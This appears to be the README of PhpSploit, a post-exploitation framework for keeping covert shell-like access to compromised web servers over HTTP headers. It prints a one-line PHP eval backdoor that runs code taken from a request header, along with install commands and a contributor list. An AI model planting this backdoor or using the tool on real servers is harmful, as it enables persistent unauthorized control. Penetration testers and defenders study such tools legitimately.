PhpSploit: Furtive post-exploitation framework

PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.

travis build codacy code quality lgtm alerts codecov coverage codeclimate maintainability license requires.io requirements

phpsploit demo


Overview

The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor:

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

Quick Start

git clone https://github.com/nil0x42/phpsploit
cd phpsploit/
pip3 install -r requirements.txt
./phpsploit --interactive --eval "help help"

Features

Supported platforms (as attacker):

Supported platforms (as target):

Contributors

Thanks goes to these people (emoji key):

nil0x42
nil0x42

💻 🚇 🔌 ⚠️
shiney-wh
shiney-wh

💻 🔌
Wannes Rombouts
Wannes Rombouts

💻 🚧
Amine Ben Asker
Amine Ben Asker

💻 🚧
jose nazario
jose nazario

📖 🐛
Sujit Ghosal
Sujit Ghosal

📝
Zerdoumi
Zerdoumi

🐛
tristandostaler
tristandostaler

🐛
Rohan Tarai
Rohan Tarai

🐛

This project follows the all-contributors specification. Contributions of any kind welcome!